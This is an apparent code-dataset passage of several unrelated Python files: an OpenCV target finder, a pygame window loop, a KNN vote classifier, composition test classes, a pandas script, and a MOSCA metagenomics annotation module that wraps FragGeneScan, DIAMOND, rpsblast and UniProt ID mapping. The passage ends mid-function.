        """Return just the polygon from a (polygon, x, y, w, h) tuple."""
        p,x,y,w,h = t
        return p

    def contours_to_polygon_tuples(self, contours):
        """Approximate each plausibly-sized contour as a polygon, keeping its
        bounding box alongside: returns [(polygon, x, y, w, h), ...]."""
        polygon_tuples = []
        for c in contours:
            x, y, w, h = boundingRect(c)
            if self.aspect_ratio_and_size_correct(w,h):
                p = approxPolyDP(c, 20, False)
                polygon_tuples.append((p,x,y,w,h))
        return polygon_tuples

    def aspect_ratio_and_size_correct(self, width, height):
        """True when width/height is within the accepted target aspect window.
        Pixel-size limits are deliberately not applied: range changes how many
        pixels a real target covers."""
        ratio = float(width)/height #float(height)/width
        return ratio < self.max_target_aspect_ratio and ratio > self.min_target_aspect_ratio #and width > self.target_min_width and width < self.target_max_width
if '__main__'==__name__:
    # Use the image path argument when given; otherwise fall back to the live
    # VideoCapture(0) stream (img_path=None). The original used a bare
    # `except:` around sys.argv[1], which also swallowed SystemExit and
    # KeyboardInterrupt; an explicit length check is clearer and safer.
    img_path = sys.argv[1] if len(sys.argv) > 1 else None
    ImageProcessor(img_path).video_feed()
|
18,713 | a4d451f6d3613c1a257027d90d47e40d681ab56f | import pygame
pygame.init()

# Window dimensions and a small BGR-independent color palette.
display_width = 800
display_length = 600
black = (0,0,0)
white = (255,255,255)
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)

gameDisplay = pygame.display.set_mode((display_width,display_length))
pygame.display.set_caption('ass')
clock = pygame.time.Clock()

# Event loop: run until the window close button fires a QUIT event.
crashed = False
while not crashed:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            crashed = True
        # Echo every event for debugging.
        print(event)
    pygame.display.update() #pygame.display.flip()
    clock.tick(60)  # cap at 60 FPS

pygame.quit()
quit()
|
18,714 | dc3a52f38095cda91c52d636a043cb701a299f22 |
# coding: utf-8
# In[30]:
import os

import pandas as pd
import numpy as np
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import LabelEncoder

# Exported from a Jupyter notebook. The bare `ls` cell left over from the
# export was removed: outside IPython it is a plain name lookup and raises
# NameError. The no-op echo cells (os.getcwd(), df.head(), X.shape, ...) were
# dropped for the same reason - they do nothing in a plain script.
os.chdir("C:/Users/Dheeraj B/Desktop/dataset")

df = pd.read_csv("votes.csv")
df.info()

knn = KNeighborsClassifier(n_neighbors=5)

# Encode every categorical column to integer labels so KNN can use them.
df = df.apply(LabelEncoder().fit_transform)

X = df.drop(["party"], axis=1)
Y = df["party"]

# First 400 rows train, the rest test (the model itself is fit on all rows,
# matching the original notebook's behavior).
train = df.iloc[:400]
test = df.iloc[400:]

# Create arrays for the features and the response variables
y = train["party"].values
x = train.drop('party', axis=1).values

model1 = knn.fit(X, Y)

y_test = test["party"]
test_pred = test.drop(["party"], axis=1)
y_pred = model1.predict(test_pred)

# Accuracy: fraction of test rows whose prediction matches the true label.
# (Renamed the loop variables - the original reused x/y, shadowing the
# training arrays above.)
mis_classified = []
for actual, predicted in zip(y_test, y_pred):
    if actual != predicted:
        mis_classified.append(actual)
print (1-(len(mis_classified)/len(y_test)))

df.head()
|
18,715 | 8d4a720b261270a1304378662c34e84a6a49ecf9 | """
This holds a series of classes specifically designed to test
results in a deterministic way.
"""
import xcomposite
class DecoratorBase(xcomposite.Composition):
    """
    Each decorator is represented by a function. All of which
    will return 1 or 'A' (in whatever expected form).

    Each method exercises exactly one xcomposite result-combining
    decorator, so composed results are deterministic in tests.
    """
    @xcomposite.take_min
    def min(self):
        return 1
    @xcomposite.take_max
    def max(self):
        return 1
    @xcomposite.take_sum
    def sum(self):
        return 1
    @xcomposite.take_first
    def first(self):
        return 'A'
    @xcomposite.take_last
    def last(self):
        return 'A'
    @xcomposite.append_results
    def append(self):
        return 'A'
    @xcomposite.append_unique
    def append_unique(self):
        return 'X'
    @xcomposite.extend_results
    def extend_list(self):
        return ['A']
    @xcomposite.take_average
    def average(self):
        return 1.0
    @xcomposite.update_dictionary
    def update(self):
        return dict(foo=1)
class DecoratorTesterA(DecoratorBase):
    """
    Undecorated overrides of DecoratorBase's methods; the combining
    decorators are inherited from the base class, and every override
    returns the same 1 / 'A'-shaped value as the base.
    """
    def min(self):
        return 1
    def max(self):
        return 1
    def sum(self):
        return 1
    def first(self):
        return 'A'
    def last(self):
        return 'A'
    def append(self):
        return 'A'
    def append_unique(self):
        return 'X'
    def extend_list(self):
        return ['A']
    def average(self):
        return 1.0
    def update(self):
        return dict(foo=1)
class DecoratorTesterB(xcomposite.Composition):
    """
    Each decorator is represented by a function. All of which
    will return 2 or 'B' (in whatever expected form).

    Unlike DecoratorTesterA, this inherits straight from
    xcomposite.Composition and carries no decorators of its own.
    """
    def min(self):
        return 2
    def max(self):
        return 2
    def sum(self):
        return 2
    def first(self):
        return 'B'
    def last(self):
        return 'B'
    def append(self):
        return 'B'
    def append_unique(self):
        return 'X'
    def extend_list(self):
        return ['B']
    def average(self):
        return 2.0
    def update(self):
        return dict(bar=1)
# ------------------------------------------------------------------------------
class UndecoratedTesterA(xcomposite.Composition):
    """Composition part whose method carries no combining decorator; returns 1."""
    def undecorated(self):
        return 1
# ------------------------------------------------------------------------------
class UndecoratedTesterB(xcomposite.Composition):
    """Composition part whose method carries no combining decorator; returns 2."""
    def undecorated(self):
        return 2
# ------------------------------------------------------------------------------
class PartiallyDecoratedTesterA(xcomposite.Composition):
    """Only this side of the pair decorates test(); its partner class does not."""
    @xcomposite.take_max
    def test(self):
        return 1
# ------------------------------------------------------------------------------
class PartiallyDecoratedTesterB(xcomposite.Composition):
    """Undecorated counterpart to PartiallyDecoratedTesterA."""
    def test(self):
        return 2
|
18,716 | 1beab001ed0c59099b5deeb4617e489959dc274b | #Anneliek ter Horst, 2017
# imports
import csv
import sys
import pandas as pd
import time
from collections import Counter
from collections import defaultdict
# Read the per-species counts table (first CSV column is the index).
# `DataFrame.from_csv` was deprecated in pandas 0.21 and removed in 1.0;
# `read_csv(..., index_col=0)` is the documented replacement. (from_csv also
# tried to parse the index as dates by default; the index here is then
# discarded by reset_index/renaming, so that difference does not matter.)
df = pd.read_csv(sys.argv[1], index_col=0).reset_index()
df.columns = ['index', 'counts', 'species', 'family']

# Total read counts per family, written to the output CSV.
df2 = df.groupby('family')['counts'].sum()
df2.to_csv(sys.argv[2])
|
18,717 | d92351e74f1a7c36f11612e0a9fd7fb07a5b31ac | #def write_repeat (message, n):
# for i in range (n):
# print (message)
#write_repeat ("Hello", 5)
def hof_write_repeat (message, n, action):
    """Apply `action` to `message` exactly `n` times (higher-order function)."""
    for _ in range(n):
        action(message)
# Demo: pass the builtin `print` as the action.
hof_write_repeat ("Hello", 5, print)
# Import the logging library
import logging
# Log the output as an error instead
hof_write_repeat ("hello", 5, logging.error) |
18,718 | 032be867556a3560836e11b51f6d7dcaa693b9c9 | # -*- coding: utf-8 -*-
"""
MOSCA's Annotation package for Gene Calling and
Alignment of identified ORFs to UniProt database
By João Sequeira
Jun 2017
"""
from diamond import DIAMOND
from mosca_tools import MoscaTools
from uniprot_mapping import UniprotMapping
from progressbar import ProgressBar
from io import StringIO
from tqdm import tqdm
import pandas as pd
import numpy as np
import time, os, shutil, glob, urllib.request, urllib.parse, urllib.error,urllib.request,urllib.error,urllib.parse
mtools = MoscaTools()
upmap = UniprotMapping()
class Annotater:
    def __init__ (self, **kwargs):
        # Promote every keyword argument to an instance attribute; the methods
        # below read at least self.threads, self.db, self.out_dir and self.name.
        self.__dict__ = kwargs
'''
Input:
file: name of input file to perform gene calling on
output: basename of output files
assembled: True if input is contigs, False if it are reads
error_model: quality model to consider when input are reads
Output:
FragGeneScan output files will be produced with basename 'output + /fgs'
If input is FASTQ reads (if assembled == False) a FASTA version will
be produced in the same folder with the same name as the FASTQ file
(but with .fasta instead of .fastq)
'''
def gene_calling(self, file, output, assembled = True, error_model = 'illumina_10'):
bashCommand = 'run_FragGeneScan.pl -genome='
if assembled:
bashCommand += file + ' -out=' + output + '/fgs -complete=1 -train=./complete'
else:
mtools.fastq2fasta(file, file.replace('fastq', 'fasta')) # fraggenescan only accepts FASTA input
bashCommand += (file.replace('fastq', 'fasta') + ' -out=' + output +
'/fgs -complete=0 -train=./' + error_model)
bashCommand += ' -thread=' + self.threads
mtools.run_command(bashCommand)
    def annotation(self):
        # Align the FragGeneScan protein predictions (fgs.faa) against the
        # reference database with DIAMOND, keeping only the best hit per query
        # and recording unaligned queries to a separate FASTA.
        diamond = DIAMOND(threads = self.threads,
                          db = self.db,
                          out = self.out_dir + '/Annotation/' + self.name + '/aligned.blast',
                          query = self.out_dir + '/Annotation/' + self.name + '/fgs.faa',
                          un = self.out_dir + '/Annotation/' + self.name + '/unaligned.fasta',
                          unal = '1',
                          max_target_seqs = '1')
        # A FASTA database is converted to DIAMOND's .dmnd format on first use.
        if self.db[-6:] == '.fasta':
            print('FASTA database was inputed')
            if not os.path.isfile(self.db.replace('fasta','dmnd')):
                print('DMND database not found. Generating a new one')
                diamond.set_database(self.db, self.db.replace('fasta','dmnd'))
            else:
                print('DMND database was found. Using it')
        elif self.db[-5:] != '.dmnd':
            print('Database must either be a FASTA (.fasta) or a DMND (.dmnd) file')
            exit()
        # DIAMOND expects the database name without its extension.
        diamond.db = self.db.split('.dmnd')[0] if '.dmnd' in self.db else self.db.split('.fasta')[0]
        diamond.run()
'''
Input:
ids: list of UniProt IDs to query
original_database: database from where the IDs are
database_destination: database to where to map (so far, only works with 'ACC'
output_format: format of response to get
columns: names of UniProt columns to get info on
databases: names of databases to cross-reference with
Output:
Returns the content of the response from UniProt
'''
    def uniprot_request(self, ids, original_database = 'ACC+ID', database_destination = '',
                        output_format = 'tab', columns = None, databases = None):
        # Single POST to UniProt's uploadlists ID-mapping endpoint; returns the
        # decoded response body (tab table or FASTA, per output_format).
        # NOTE(review): uploadlists is UniProt's legacy mapping endpoint -
        # confirm it is still served before relying on this code.
        base_url = 'https://www.uniprot.org/uploadlists/'
        params = {
            'from':original_database,
            'format':output_format,
            'query':' '.join(ids),
            'columns':upmap.string4mapping(columns = columns, databases = databases)
        }
        # Map to plain accessions ('ACC') unless the caller specified otherwise.
        if database_destination != '' or original_database == 'ACC+ID':
            params['to'] = 'ACC'
        data = urllib.parse.urlencode(params).encode("utf-8")
        request = urllib.request.Request(base_url, data)
        response = urllib.request.urlopen(request)
        return response.read().decode("utf-8")
'''
Input:
ids: list of UniProt IDs to query
original_database: database from where the IDs are
output_format: format of response to get
database_destination: database to where to map (so far, only works with 'ACC'
chunk: INT, number of IDs to send per request
sleep: INT, number of seconds to wait between requests
columns: names of UniProt columns to get info on
databases: names of databases to cross-reference with
Output:
If output format is 'tab', a pd.DataFrame will be returned with the information
about the IDs queried.
If output format is 'fasta', a Str containing the fasta sequences and headers
of the proteis belonging to the IDs queried will be returned.
'''
    def get_uniprot_information(self, ids, original_database = 'ACC+ID', output_format = 'tab',
                                database_destination = '', chunk = 1000, sleep = 30,
                                columns = None, databases = None):
        # Query UniProt in chunks of `chunk` IDs, sleeping `sleep` seconds
        # between requests to stay polite to the service.
        pbar = ProgressBar()
        print('Retrieving UniProt information from ' + str(len(ids)) + ' IDs.')
        if output_format == 'tab':
            result = pd.DataFrame()
            for i in pbar(range(0, len(ids), chunk)):
                j = i + chunk if i + chunk < len(ids) else len(ids)
                try:
                    data = self.uniprot_request(ids[i:j], original_database,
                                                database_destination, columns = columns,
                                                databases = databases)
                    if len(data) > 0:
                        uniprotinfo = pd.read_csv(StringIO(data), sep = '\t')
                        result = pd.concat([result, uniprotinfo[uniprotinfo.columns.tolist()[:-1]]]) # last column is uniprot_list
                    time.sleep(sleep)
                except:
                    # NOTE(review): deliberate best-effort - any failure
                    # (network, parse, Ctrl-C) returns the partial DataFrame
                    # collected so far; the recursive_* callers retry missing
                    # IDs. A narrower `except Exception` would be safer.
                    return result
        elif output_format == 'fasta':
            result = str()
            for i in pbar(range(0, len(ids), chunk)):
                j = i + chunk if i + chunk < len(ids) else len(ids)
                data = self.uniprot_request(ids[i:j], original_database,
                                            database_destination, output_format = output_format)
                if len(data) > 0:
                    result += data
                time.sleep(sleep)
        return result
def recursive_uniprot_fasta(self, output, fasta = None, blast = None, max_iter = 5):
    '''
    Iteratively fetch FASTA sequences for all UniProt IDs found in a FASTA or
    BLAST file, appending to `output` and retrying until all IDs are covered
    or `max_iter` rounds have been made.
    output: FASTA filename to append results to (also used to resume)
    fasta / blast: exactly one should name the file that provides the IDs
    '''
    if fasta is not None:
        fasta = mtools.parse_fasta(fasta)
        all_ids = list(set(fasta.keys()))
    elif blast is not None:
        blast = mtools.parse_blast(blast)
        # sseqid has the form db|ACCESSION|name; '*' marks unidentified proteins
        all_ids = list(set([ide.split('|')[1] if ide != '*' else ide
                            for ide in blast.sseqid]))
    i = 0
    # resume from a previous run if the output file already exists
    ids_done = ([ide.split('|')[1] for ide in mtools.parse_fasta(output).keys()]
                if os.path.isfile(output) else list())
    # fix: defined before the loop so the final report cannot hit an unbound name
    ids_missing = list(set(all_ids) - set(ids_done))
    while len(ids_done) < len(all_ids) and i < max_iter:
        print('Checking which IDs are missing information.')
        pbar = ProgressBar()
        ids_missing = list(set([ide for ide in pbar(all_ids) if ide not in ids_done]))
        print('Information already gathered for ' + str(len(ids_done)) +
              ' ids. Still missing for ' + str(len(ids_missing)) + '.')
        uniprotinfo = self.get_uniprot_information(ids_missing,
                                                   output_format = 'fasta')
        with open(output, 'a') as file:
            file.write(uniprotinfo)
        ids_done = [ide.split('|')[1] for ide in mtools.parse_fasta(output).keys()]
        i += 1
    if len(ids_done) == len(all_ids):
        print('Results for all IDs are available at ' + output)
    else:
        ids_unmapped_output = '/'.join(output.split('/')[:-1]) + '/ids_unmapped.txt'
        with open(ids_unmapped_output, 'w') as handler:   # fix: file was never closed
            handler.write('\n'.join(ids_missing))
        print(str(i) + ' iterations were made. Results related to ' + str(len(ids_missing)) +
              ' IDs were not obtained. IDs with missing information are available' +
              ' at ' + ids_unmapped_output + ' and information obtained is available' +
              ' at ' + output)
def recursive_uniprot_information(self, blast, output, max_iter = 5,
                                  columns = None, databases = None):
    '''
    Iteratively retrieve UniProt information for every ID referenced in a
    BLAST file, resuming from a previous `output` TSV if it exists and
    retrying failed requests up to `max_iter` rounds.
    blast: filename of DIAMOND/BLAST annotation results
    output: TSV filename where gathered information is (re)written
    columns, databases: forwarded to get_uniprot_information
    '''
    if os.path.isfile(output):
        # resume: reuse information gathered by a previous run
        result = pd.read_csv(output, sep = '\t', low_memory=False).drop_duplicates()
        ids_done = list(set(result['Entry']))
    else:
        print(output + ' not found.')
        ids_done = list()
        result = pd.DataFrame()
    # sseqid has the form db|ACCESSION|name; '*' marks unidentified proteins
    all_ids = set([ide.split('|')[1] for ide in mtools.parse_blast(blast)['sseqid'] if ide != '*'])
    tries = 0
    ids_unmapped_output = '/'.join(output.split('/')[:-1]) + '/ids_unmapped.txt'
    ids_missing = list(set(all_ids) - set(ids_done))
    print('IDs present in blast file: ' + str(len(all_ids)))
    print('IDs present in uniprotinfo file: ' + str(len(ids_done)))
    print('IDs missing: ' + str(len(ids_missing)))
    while len(ids_missing) > 0 and tries < max_iter:
        print('Information already gathered for ' + str(len(ids_done)) +
              ' ids. Still missing for ' + str(len(ids_missing)) + '.')
        uniprotinfo = self.get_uniprot_information(ids_missing,
                            columns = columns, databases = databases)
        ids_done += list(set(uniprotinfo['Entry']))
        # align previous results to the newly returned columns before concatenating
        # NOTE(review): raises KeyError when `result` lacks one of these columns
        # (e.g. empty first run) — confirm against get_uniprot_information output
        result = result[uniprotinfo.columns]
        result = pd.concat([result, uniprotinfo])
        ids_missing = list(set(all_ids) - set(ids_done))
        if len(ids_missing) > 0:
            print('Failed to retrieve information for some IDs. Retrying request.')
            tries += 1
    result.to_csv(output, sep = '\t', index = False)
    if len(ids_missing) == 0:
        print('Results for all IDs are available at ' + output)
    else:
        open(ids_unmapped_output, 'w').write('\n'.join(ids_missing))
        print('Maximum iterations were made. Results related to ' + str(len(ids_missing)) +
              ' IDs were not obtained. IDs with missing information are available' +
              ' at ' + ids_unmapped_output + ' and information obtained is available' +
              ' at ' + output)
'''
Input:
pathway: a String row from UniProt's 'Pathway' column
Output:
returns List of pathways included in that row
'''
def split(self, pathway):
    '''Break a UniProt 'Pathway' cell into its individual pathway strings.'''
    return [entry for entry in pathway.split('. ') if entry != '']
'''
Input:
ec: a String row from UniProt's 'EC number' column
Output:
returns List of EC numbers included in that row
'''
def split_ec(self, ec):
    '''Break a UniProt 'EC number' cell into its individual EC numbers.'''
    return [number for number in ec.split('; ') if number != '']
'''
Input:
pathway: a String row from UniProt's 'Pathway' column
Output:
Receives a pd.DataFrame object and breaks the list elements in the 'Pathway'
column, duplicating rows that hold several 'Pathway' elements so that each
resulting row has a single 'Pathway' element
'''
def using_repeat(self, df, column = 'Pathway'):
    '''
    Expand `df` so that each element of the lists stored in `column` gets its
    own row, with the values of all other columns repeated accordingly.
    df: pd.DataFrame whose `column` holds lists
    column: name of the list-valued column to expand
    Returns the expanded pd.DataFrame.
    '''
    import numpy as np
    import pandas as pd
    lens = [len(item) for item in df[column]]
    dictionary = dict()
    # fix: the loop variable used to shadow the `column` parameter, so the
    # concatenation below was applied to whatever column happened to be last
    for col in df.columns:
        dictionary[col] = np.repeat(df[col].values, lens)
    dictionary[column] = np.concatenate(df[column].values)
    return pd.DataFrame(dictionary)
'''
Input:
uniprotinfo: information from UniProt ID mapping
blast: blast file from DIAMOND annotation
output: basename for EXCEL files to output
Output:
Two EXCEL files formatted for Krona plotting with taxonomic and functional
information.
This function is very useful if wanting to use UniProt 'Pathway' information,
as it uses the three previous functions to organize the information from
that column into the three functional levels of UniProt Pathways.
This function was very cool
'''
def uniprotinfo_to_excel(self, uniprotinfo, blast, output):
    '''
    Merge UniProt information with BLAST results and write two Krona-ready
    EXCEL files: `output`_taxonomic_krona.xlsx and `output`_functional_krona.xlsx.
    uniprotinfo: TSV of UniProt ID-mapping information
    blast: DIAMOND annotation BLAST file
    output: basename for the EXCEL files
    '''
    blast = mtools.parse_blast(blast)
    uniprotdf = pd.read_csv(uniprotinfo, sep = '\t', index_col = 0).drop_duplicates()
    pbar = ProgressBar()
    # assumes MetaSPAdes-style contig names with coverage as the 6th '_'-field — TODO confirm
    blast['Coverage'] = [float(ide.split('_')[5]) for ide in pbar(blast.qseqid)]
    pbar = ProgressBar()
    blast['ID'] = [ide.split('|')[-1] for ide in pbar(blast.sseqid)]
    uniprotdf = pd.merge(uniprotdf, blast, left_index = True, right_on = 'ID')
    tax_columns = ['Taxonomic lineage (SUPERKINGDOM)','Taxonomic lineage (PHYLUM)',
                   'Taxonomic lineage (CLASS)','Taxonomic lineage (ORDER)',
                   'Taxonomic lineage (FAMILY)','Taxonomic lineage (GENUS)',
                   'Taxonomic lineage (SPECIES)','Coverage']
    # sum coverage per full taxonomic lineage
    taxdf = uniprotdf[tax_columns].groupby(tax_columns[:-1])['Coverage'].sum().reset_index()
    taxdf.to_excel(output + '_taxonomic_krona.xlsx', index = False)
    print('Saved taxonomy')
    func_columns = ['Pathway','Protein names','EC number']
    funcdf = uniprotdf[uniprotdf.Pathway.notnull()][func_columns + ['Coverage']]
    # expand multi-pathway cells into one row per pathway
    funcdf.Pathway = funcdf.Pathway.apply(self.split)
    funcdf = self.using_repeat(funcdf)
    # split 'Super; Pathway; Sub' strings into three columns, padding with NaN
    pathways = pd.DataFrame([(path.split('; ') + [np.nan] * (3 - len(path.split('; '))))
                             for path in funcdf.Pathway], index = funcdf.index)
    pathways.columns = ['Superpathway','Pathway','Subpathway']
    del funcdf['Pathway']
    funcdf = pd.concat([pathways, funcdf], axis = 1)
    funcdf = funcdf[['Superpathway','Pathway','Subpathway','EC number',
                     'Protein names','Coverage']]
    funcdf = funcdf.groupby(funcdf.columns.tolist()[:-1])['Coverage'].sum().reset_index()
    funcdf.to_excel(output + '_functional_krona.xlsx', index = False)
    print('Saved pathways')
def info_with_coverage_metaspades(self, blast, output):
    '''
    Retrieve UniProt information for BLAST hits grouped by the contig coverage
    encoded in MetaSPAdes contig names, writing a TSV table to `output`.
    blast: DIAMOND/BLAST annotation file with MetaSPAdes contig names
    output: TSV filename for the gathered information (checkpointed on failure)
    '''
    blast = mtools.parse_blast(blast)
    # MetaSPAdes contig names encode coverage as the 6th '_'-separated field
    blast['coverage'] = [float(ide.split('_')[5]) for ide in blast.qseqid]
    result = pd.DataFrame()
    for value in set(blast.coverage):
        print(value)
        ids = [ide.split('|')[-1] for ide in blast[blast['coverage'] == value]['sseqid']]
        print(len(ids))
        part = None
        # the UniProt service is flaky: try each coverage group twice
        # (previously two copy-pasted try/except blocks with bare excepts)
        for attempt in range(2):
            try:
                part = self.get_uniprot_information(ids)
                break
            except Exception:
                part = None
        if part is None:
            # checkpoint what was gathered so far and log the failed group
            result.to_csv(output, sep = '\t', index = False)
            with open('errors.log', 'a') as log:
                log.write(str(value) + ' failed\n')   # fix: entries used to run together without a newline
            continue
        part['coverage'] = value
        result = pd.concat([result, part])
    result.to_csv(output, sep = '\t', index = False)
def ni_proteins(self, fasta, blast, output, ni_proteins = True):
    '''
    Write to `output` the proteins from `fasta` that were left unidentified
    ('*') in `blast` (ni_proteins=True) or that were identified
    (ni_proteins=False). Sequences containing '*' (internal stops) are skipped.
    '''
    proteins = mtools.parse_fasta(fasta)
    blast = mtools.parse_blast(blast)
    blast.index = blast.qseqid      # fix: was blast.qseqids, an AttributeError
    ids = (list(blast[blast.sseqid == '*'].index) if ni_proteins
           else list(blast[blast.sseqid != '*'].index))
    with open(output, 'w') as handler:   # fix: file handle was not context-managed
        for ide in ids:
            if '*' not in proteins[ide]:
                handler.write('>' + ide + '\n' + proteins[ide] + '\n')
def parse_interproscan_output(self, file):
    '''Load an InterProScan TSV output file into a DataFrame with named columns.'''
    frame = pd.read_csv(file, sep = '\t', header = None)
    frame.columns = ['Protein Accession', 'Sequence MD5 digest', 'Sequence Length',
                     'Analysis', 'Signature Accession', 'Signature Description',
                     'Start location', 'Stop location', 'Score', 'Status', 'Date',
                     'InterPro annotations - accession', 'InterPro annotations - description',
                     'GO annotations', 'Pathways annotations']
    return frame
def correct_interproscan_file(self, file):
    '''
    Pad every line of an InterProScan output file to 14 tab separators so the
    file parses as a rectangular 15-column TSV, rewriting it in place.
    '''
    with open(file) as handler:          # fix: files were opened without being closed
        lines = handler.readlines()
    lines = [line.rstrip('\n') + '\t' * (14 - line.count('\t')) + '\n' for line in lines]
    with open(file, 'w') as handler:
        handler.write(''.join(lines))
'''
Input:
blast: name of an annotated blast file, probably with a lot of not identified (*) proteins
interproscan: name of an InterProScan result file with hopefully CDD annotations
output: name of file to output
Output:
an annotated blast file where, if the respective protein had identifications in
the CDD database, protein names are replaced by the CDD IDs (this may produce
additional lines per protein, since several domains might be identified) (output)
'''
def blast2cddblast(self, blast, interproscan, output, correct_interproscan = True):
    '''
    Build a BLAST-format file whose sseqid column carries CDD IDs taken from
    an InterProScan result, matching rows by position.
    blast: annotated blast filename
    interproscan: InterProScan result filename (hopefully with CDD annotations)
    output: filename of the BLAST file to write
    correct_interproscan: pad the InterProScan file to 15 columns first
    '''
    blastdf = mtools.parse_blast(blast)
    if correct_interproscan:
        self.correct_interproscan_file(interproscan)
    interproscandf = self.parse_interproscan_output(interproscan)
    interproscandf = interproscandf[interproscandf['Analysis'] == 'CDD']
    print('Building BLAST file with CDD annotations...')
    pbar = ProgressBar()
    rows = []
    for i in pbar(range(len(interproscandf))):
        # rows are matched by position: the i-th CDD hit gets the i-th BLAST line
        row = blastdf.iloc[i].copy()    # copy: do not mutate blastdf in place
        row['sseqid'] = interproscandf.iloc[i]['Signature Accession']
        rows.append(row)
    # fix: DataFrame.append was removed in pandas 2.0; build once from the row list
    cddblastdf = pd.DataFrame(rows, columns = blastdf.columns)
    cddblastdf.to_csv(output, index = False, header = False, sep = '\t')
'''
Input: name of a fasta file of proteins to be annotated
COG blast DB namebase from ftp://ftp.ncbi.nlm.nih.gov/pub/mmdb/cdd/little_endian/Cog_LE.tar.gz
name of output file
Output: annotated file with CDD IDs
'''
def run_rpsblast(self, fasta, output, cog, threads = '0'):
    '''
    Annotate `fasta` against the COG profile database with RPS-BLAST, writing
    tabular (outfmt 6) results to `output`.
    '''
    command = ('rpsblast -query ' + fasta + ' -db "' + cog + '" -out ' +
               output + ' -outfmt 6 -num_threads ' + threads +
               ' -max_target_seqs 1')
    # subprocess was not handling this command well, so it is written to an
    # intermediate script and executed through bash
    script = 'MOSCA/Databases/COG/command.bash'
    with open(script, 'w') as handle:
        handle.write(command + '\n')
    print(command)
    mtools.run_command('bash ' + script)
    os.remove(script)
def run_recursively_rpsblast(self, fasta, output, cog, threads = '0', max_tries = 5):
    '''
    Annotate `fasta` with RPS-BLAST against the COG database, re-submitting
    the proteins that got no hit (rpsblast self-reportedly runs out of memory
    and silently skips queries) until all are annotated or `max_tries` rounds
    have been made.
    '''
    all_mapped = False
    tries = 0    # fix: started at 1, so the first round tried to read fasta+'1', which does not exist yet
    fastadf = None
    blast = None
    while not all_mapped and tries < max_tries:
        (f_file, o_file) = (fasta, output) if tries == 0 else (
                fasta + '1', output + '1')
        self.run_rpsblast(f_file, o_file, cog, threads = threads)
        print('Checking if all IDs were mapped to COG database.')
        if os.path.getsize(o_file) > 0:         # rpsblast produced new annotations
            blast = mtools.parse_blast(o_file)
            fastadf = pd.DataFrame.from_dict(mtools.parse_fasta(f_file),
                                             orient = 'index').reset_index()
            fastadf.columns = ['qseqid', 'sequence']
            unmapped_ids = set(fastadf['qseqid']) - set(blast['qseqid'])
            print(str(len(unmapped_ids)) + ' IDs still not annotated.')
            if len(unmapped_ids) > 0:
                # write the still-unannotated proteins to a new FASTA for the next round
                fastadf = fastadf[fastadf['qseqid'].isin(unmapped_ids)]
                fastadf['qseqid'] = '>' + fastadf['qseqid']
                fastadf.to_csv(fasta + '1', sep = '\n', index = False,
                               header = False)
            else:
                all_mapped = True
            if tries > 0:
                # merge this round's annotations into the main output
                mtools.run_command('cat {} {}'.format(output, output + '1'),
                                   file = output + '2')
                os.rename(output + '2', output)
        tries += 1
    if os.path.isfile(output + '1'):
        os.remove(output + '1')
    if fastadf is None or blast is None:
        # fix: these names were unbound when rpsblast never produced output
        print('RPS-BLAST produced no annotations for {}'.format(fasta))
        return
    still_unmapped = set(fastadf['qseqid']) - set(blast['qseqid'])
    if len(still_unmapped) > 0:
        unmapped_file = fasta.replace('.faa', '_unmapped.faa')
        with open(unmapped_file, 'w') as handle:
            handle.write('\n'.join(still_unmapped))
        # fix: used to print a boolean (len(...) > 0) instead of the count
        print('PSI-BLAST failed to functionally annotate {} proteins'.format(
                len(still_unmapped)))
        # fix: a '+' before .format left the first '{}' placeholder unfilled
        print('Unmapped IDs are available at {} and results for the annotated'
              ' proteins are available at {}'.format(unmapped_file, output))
    else:
        print('Results for all IDs are available at {}'.format(output))
'''
Input:
name of blast output with CDD IDs
name of cddid summary file from ftp://ftp.ncbi.nlm.nih.gov/pub/mmdb/cdd/cddid.tbl.gz
name of fun file available at ftp://ftp.ncbi.nlm.nih.gov/pub/COG/COG/fun.txt
name of whog file available at ftp://ftp.ncbi.nlm.nih.gov/pub/COG/COG/whog
name of cdd2cog script
output folder where to store the results folder
Output: results folder
'''
def annotate_cogs(self, blast, output, cddid, fun, whog):
    '''
    Convert RPS-BLAST CDD hits to COG annotations with the cdd2cog script,
    moving the generated 'results' folder into `output`.
    '''
    command = ('perl MOSCA/scripts/cdd2cog.pl -r ' + blast + ' -c ' +
               cddid + ' -f ' + fun + ' -w ' + whog)
    mtools.run_command(command)
    # cdd2cog writes to ./results; replace any previous results under `output`
    if os.path.isdir(output + '/results'):
        shutil.rmtree(output + '/results')
    os.rename('results', output + '/results')
'''
Input:
cogblast: the output from cdd2go, a blast file with CDD and COG annotations
fun: the fun.txt file available at ftp://ftp.ncbi.nih.gov/pub/COG/COG/fun.txt
Output:
returns pandas.DataFrame with the functional categories' intrinsic levels
reorganized into corresponding columns
'''
def organize_cdd_blast(self, cogblast, fun = 'MOSCA/Databases/COG/fun.txt'):
    '''
    Reorganize a cdd2cog blast file so the COG functional categories appear as
    two columns (general category, category) next to the protein description,
    COG ID and query ID.
    cogblast: the output from cdd2cog, a blast file with CDD and COG annotations
    fun: the fun.txt file with the COG category hierarchy
    Returns the reorganized pandas.DataFrame.
    '''
    cogblast = self.parse_cogblast(cogblast)
    # fix: reset the index after filtering — pd.concat(axis=1) aligns on index,
    # and the gaps left by the notnull() filter used to misalign rows with `result`
    cogblast = cogblast[cogblast['functional categories'].notnull()].reset_index(drop = True)
    cog_relation = self.parse_fun(fun)
    data = [cog_relation[functional_category] for functional_category in cogblast['functional categories']]
    result = pd.DataFrame(data, columns = ['COG general functional category',
                                           'COG functional category'])
    result = pd.concat([result, cogblast[['COG protein description', 'cog', 'qseqid']]],
                       axis = 1)
    return result
'''
Input:
cogblast: the output from cdd2go, a blast file with CDD and COG annotations
output: filename of EXCEL file to write
Output:
an EXCEL file with the COG identifications counted for krona plotting will
be written
'''
def write_cogblast(self, cogblast, output):
    '''
    Count the COG identifications in `cogblast` and write them to an EXCEL
    file (`output`) formatted for Krona plotting.
    '''
    organized = self.organize_cdd_blast(cogblast)
    # qseqid is irrelevant for counting. TODO - organize_cdd_blast runs twice in
    # the pipeline (here and in join_reports, where qseqid IS needed); rework.
    del organized['qseqid']
    counts = (organized.groupby(organized.columns.tolist()).size()
              .reset_index().rename(columns = {0: 'count'}))
    counts.to_excel(output, index = False)
'''
Input: name of cddblast to parse
Output: pandas.DataFrame object
'''
def parse_cogblast(self, cogblast):
    '''Read a cdd2cog blast file into a pandas.DataFrame with named columns.'''
